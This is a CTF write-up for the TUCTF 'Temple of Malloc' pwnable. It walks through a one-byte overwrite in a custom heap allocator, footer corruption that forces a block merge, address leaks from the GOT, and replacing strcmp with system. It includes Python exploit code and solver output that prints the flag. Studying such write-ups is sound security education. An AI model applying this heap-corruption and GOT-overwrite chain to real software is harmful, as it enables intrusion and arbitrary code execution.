TUCTF Write-up: Temple of Malloc

TUCTF Write-up: Temple of Malloc

It's been a few months since me and my team started practicing CTF again, and we finally played in a live CTF over the weekend. It was a a fun CTF, and we actually managed to place above PPP with a team of only three people.

I mean, it's clear that PPP checked out at some point, since we were only in 24th place overall, but at least we can honestly say we beat 'em once.

I gave myself the personal task of taking down every pwnable challenge on the board. The first three were pretty basic; comparable to the mid-level challenges on pwnable.kr. The final challenge, the most valuable one of the entire competition at 500 points, however, gave me some trouble.

Breakdown

Included with the challenge are three files:

  • temple: challenge binary, 64bit ELF
  • libc.so.6: copy of the libc in use by challenge server
  • mm.c: source code of the custom allocator in use by temple

When firing up the binary, I was given three options:

Child, what do you seek?
[1] Take wisdom
[2] Give wisdom
[3] Rethink wisdom
Your choice:

Before doing any reversing, I played with the binary a bit and deduced the basic behavior. Upon load, the temple contains 8 "wisdoms", with indexes 0 to 7. A wisdom can be studied using option [1], and study can only happen once. Additional wisdoms can be added, up to a total of 255, using option [2]. New wisdoms are placed sequentially starting at index 8. A wisdom is simply a block of text with a length of the user's choosing. The entire addition proccess is as so:

Your choice: 2
How much wisdom do you hold?: 10
What is your wisdom?: hello

Each wisdom text block is accompanied by a meta structure which stores information about the wisdom:

struct wisdom {
    char text[0];
};
struct wisdomMeta {
    size_t wisdomLen;
    wisdom* wisdom;
    size_t giverLen;
    char* giver;
};

The program first allocates a wisdomMeta structure of size 32, then allocates a wisdom structure with the length specified by the user. This can be seen in the binary:

Finally, wisdoms' text can be modified using option [3]. Their size cannot be changed.

1 Byte Overwrite

The bug on this challenge was actually quite easy to find, and I managed to do it blackbox. Upon wisdom creation, a function called readbytes() is called with (wisdom* text, size_t len) as arguments. This function returns a size, which is then used to set meta->wisdomSize. However, the size returned is actually len++; it does this to account for a null terminator. This accounting is not necessary, though, because the data is read using fgets(), which automatically null-terminates at len-1:

The challenge actually prints out the length of a wisdom when option [3] is used, hence the blackboxability of this discovery:

Your choice: 2
How much wisdom do you hold?: 10
    notice we specify len 10 --^
What is your wisdom?: hello
Your choice: 3
What wisdom do you wish to rethink?: 8
(11) How do you see this differently?:
  ^-- notice it says len 11

Now, because fgets() obeys len when writing a null-terminator, nothing can actually be over-written during initial wisdom creation. Instead, the bug triggers when a long enough string is supplied during rethinking.

Acolyte

Discovering this bug was one thing, exploiting it was another. Essentially, my task was to gain arbitrary execution using only b = 0 on a single byte at a position I couldn't really control.

Given the included source for the allocator, I figured I should look there. In essence, the allocator kept an underlying free pool composed of 4096 byte chunks, allocating new chunks only as-needed. When an allocation is made, the user buffer is sandwiched between two identical bookends, respectively named header and footer:

| 8-byte HEADER | N-byte DATA | 8-byte FOOTER |

These bookends contain two things: the overall size (16 + the size of the user buffer) and the allocation status of the block. The size is made divisible by 16 and is masked off with ~(0xF), leaving bits 1, 2, 4, and 8 unset. The 1 bit is used to indicate allocation status.

If you're sharp, you've probably noticed the next piece of the attack. The overflow can zero the first byte of the footer, marking the block as free and decreasing the recorded size if any of the bits 16, 32, 64, or 128 were previously set.

The problem is that this footer is rarely used. In normal operation, blocks are traversed like so:

static size_t get_size(block_t *block) {
    return (block->header & size_mask);
}
static block_t *find_next(block_t *block) {
    return (block_t *)(((char *)block) + get_size(block));
}

for (b = heap_listp; get_size(b) > 0; b = find_next(block)) {
}

Effectively speaking, normal allocation doesn't care about the footer. One thing that does care about the footer, however, is pool extension. When the allocator runs out of underlying memory, it allocates a new chunk of 4096 bytes. This is implemented by a function extend_heap(). After allocating the new chunk, a function coalesce() is called. When the block leading up to the new chunk is free, coalesce() merges the two into a single block.

For instance, if a block with size 32 is requested but only 16 bytes are free, the pool will be expanded by 4096 bytes, and this 4096 byte chunk will be configured as a free block. Then, coalesce() will merge it with the 16 bytes which were already free, creating a free block of size 4112. Finally, extend_heap() will return into mm_malloc(), which will split the free block into an allocated 48 byte block (16 extra for the bookends) and a free 4064 byte block.

This behavior uses the footer to check the allocation status. Moreover, the footer is used to locate the header. From there, the header is used to grab the block size and merge the two blocks.

Attack on Alloc

At this point, the route to victory was pretty clear to me. Achieving it, however, still wasn't simple. Quickly, let's recap on what I figured out with the information I'd found:

  • I could place a block control such that the footer was at the boundary of the pool
  • Using the overwrite, I could corrupt the footer of control, removing the allocation bit and some size bits
  • I could then allocate a block coal, which would be merged with the middle of control

Effectively speaking, this meant that I could land a wisdomMeta structure in the middle of an allocated wisdom buffer. Something like this:

| HEADER |      DATA     | FOOTER |
         | HEADER | DATA | FOOTER |

Landing this required precision. I did a bit more reverse engineering, and determined that the only allocations made during initialization are for the 8 existing wisdoms. Each wisdom, including headers, is exactly 48 bytes, giving a total of 384.

In addition, before allocating the buffer for control, 48 bytes are allocated for its wisdomMeta structure, increasing the total to 432. With the goal being a footer against the fence, this meant the wisdom length would need to be (4096 - 432) = 3664 bytes. (3664 - 16) = 3648 not including the bookends.

I also came to the realization that the attack would be quite tricky unless I triggered this bug multiple times. With that in mind, I wanted to create coal such that the pool would have exactly 3664 free bytes again. With coal taking up no extra space, due to coalesce, this left two blocks in play: the wisdom buffer for coal and the wisdomMeta structure for the next control block. Accounting for the meta structure, the wisdom buffer for coal would need to take up (432 - 48) = 384 bytes, giving a final size of (384 - 16) = 368 before bookends.

I decided that four coalesced blocks would be enough, and formulated the first stage of my attack:

CONTROL_SIZE = 3648
COAL_SIZE = 368
LAND_AT = CONTROL_SIZE - 48

read_data_until("Your choice:")

controls = []
coals = []
for num in range(0, 4):
	# create the block we want to coalesce into
	control = give_wisdom(CONTROL_SIZE, BIG_RANDOM_STRING[:CONTROL_SIZE])
	rethink_wisdom(control, BIG_RANDOM_STRING[:CONTROL_SIZE + 1])
	controls.append(control)

	# zero out what the allocator will perceive as the header
	rethink_wisdom(control, "\x00" * LAND_AT)

	# coalesce into the block
	coal = give_wisdom(COAL_SIZE, "BGN%d /bin/cat flag.txt" % num)
	coals.append(coal)

Execution

This attack gave me access to some memory, but I still needed to somehow gain execution. I realized I could get there using the Global Offset Table (GOT). Essentially, this is a table which contains the addresses of functions from other libraries.

The first step was to figure out which function address to replace. An additionally important consideration is that an appended \n and/or \x00 would likely corrupt the GOT entry following the one replaced, meaning the following function should not be called.

After a wisdom is studied, its blocks are freed. Upon free, the code compares meta->giver to the name of the default giver (which is given to all user wisdoms), only freeing meta->wisdom if they match. This is done using strmp():

By replacing strcmp() in the GOT with system(), overwriting meta->giver with /bin/cat flag.txt, and studying the affected wisdom, I could force execution of system("/bin/cat flag.txt") and trigger a win.

To start this process, I needed leak the address of any wisdom. First, because this allowed me to place /bin/cat flag.txt at a known address. Second, because a valid block address is needed in meta->wisdom upon free to prevent a crash:

# set coals[0]->wisdomLen to 0x0AFF (0x0A comes from the tailing newline)
rethink_wisdom(controls[0], "\xFF" * (LAND_AT + 1))

# leak coals[1]->wisdom
LEAK_OFFS_WISDOM = COAL_SIZE + 24
leaked = get_wisdom(coals[0])
buffAddr = unpack("<Q", leak_seek(leaked, "BGN0", LEAK_OFFS_WISDOM, 8))[0]

# decrement it so we have coals[0]->wisdom; not really needed but meh
buffAddr -= 48 + COAL_SIZE + 16

With the address of the buffer in hand, my next move was to leak an address from libc. The GOT slot for fgets() is at 0x603068, and I used that:

# place 0x603068 into coals[1]->wisdom 
leakbuf = "\x00" * LAND_AT        # leading up to the important stuff
leakbuf += pack("<Q", 0x11)       # wisdom length, 0x11 is fine
leakbuf += pack("<Q", buffAddr)   # valid buffer to prevent dealloc crash
leakbuf += pack("<Q", 0x0F)       # name length, only need 0x08 bytes
leakbuf += pack("<Q", 0x603068)   # fgets() slot in GOT as buffer for wisdom 
rethink_wisdom(controls[1], leakbuf)

# leak fgets() by studying coals[1]
leaked = get_wisdom(coals[1])
leaked = leak_seek(leaked, "\t - ", 4, 8)
fgetsAddr = unpack("<Q", leaked)[0]

Next, I needed to replace the strmp() address at 0x603070 with the system() address. I opened libc.so.6 in Binary Ninja to calculate the offsets for system() and fgets(), used a relative calculation against the leaked address, and ran a rethink:

FGETS_OFF =  0x69df0
SYSTEM_OFF = 0x41490
systemAddr = fgetsAddr + (SYSTEM_OFF - FGETS_OFF)

# place 0x603070 into coals[2]->wisdom 
leakbuf = "\x00" * LAND_AT 
leakbuf += pack("<Q", 0x11)
leakbuf += pack("<Q", 0x603070)   # strcmp slot in GOT
rethink_wisdom(controls[2], leakbuf)

# rethink coals[2] with systemAddr as the wisdom
rethink_wisdom(coals[2], pack("<Q", systemAddr))

Finally, I could trigger the attack. Using a rethink, I set the address of the command string to a coal and triggered a free:

# set coals[3]->giver to '/bin/cat flag.txt`
leakbuf = "\x00" * LAND_AT
leakbuf += pack("<Q", 0x11)
leakbuf += pack("<Q", buffAddr)
leakbuf += pack("<Q", 0x0F)
leakbuf += pack("<Q", buffAddr+5)
rethink_wisdom(controls[3], leakbuf)

# study coals[3] to trigger exploit
get_wisdom(coals[3])

Getting Flag

I ran the attack, and I got the flag. I wish I had grabbed a copy of the entire console log to show the attack chain, but, sadly, I did not, and the servers are now offline. I've still got the flag, though: TUCTF{0n3_Byt3_0v3rwr1t3_Ac0lyt3}.

EDIT: The author of the challenge saw my post and actually threw the server up so I could get the full output from my solver to post. Shout out to Gbps! Here it is:

nick@hyperion>python solve.py
Exploiting buffers (0)...
  Creating wisdom 8 with size 3648
  Creating wisdom 9 with size 368
Exploiting buffers (1)...
  Creating wisdom 10 with size 3648
  Creating wisdom 11 with size 368
Exploiting buffers (2)...
  Creating wisdom 12 with size 3648
  Creating wisdom 13 with size 368
Exploiting buffers (3)...
  Creating wisdom 14 with size 3648
  Creating wisdom 15 with size 368
Taking a leak...
  Address of my buffer: 0x0000000000ccf010
  Address of fgets(): 0x00007f2076643ad0
Overwriting values...
  Overwrote GOT for strcmp() with system() [0x00007f207661b390]
  Overwrote name field for wisdom 15 with command address [0x0000000000ccf015]
Attempting exploit...
TUCTF{0n3_Byt3_0v3rwr1t3_Ac0lyt3}

Gained a Wisdom

This challenge was definitely a learning experience. It's probably the most difficult challenge I've ever tackled in the pwnable CTF category, but it was also the most fun and most rewarding. It required me to chain together multiple mini-attacks to win, and the vulnerability condition was an edge-case reminiscent of the ActionScript Spray attacks used to exploit Internet Explorer UaF bugs a few years back.

I'm really happy to have solved this challenge, and I hope you've learned something by following along. Let me know in the comments if you think something needs clarification, is missing, or could be improved!

I spent a lot of time scratching my head, reworking my attack, and solving absurd math problems to properly calculate offsets. There were also a lot of edge cases I ran into which caused crashes that needed to be dealt with. I can't possibly even document the whole process! Looking at the minimap of my solver, this is plain to see. Aside from the big comment explaining the attack about 40% of the way down, the comments are all attacks I used during testing, discovery, or failure (and they don't include the code which was removed or changed):

temple5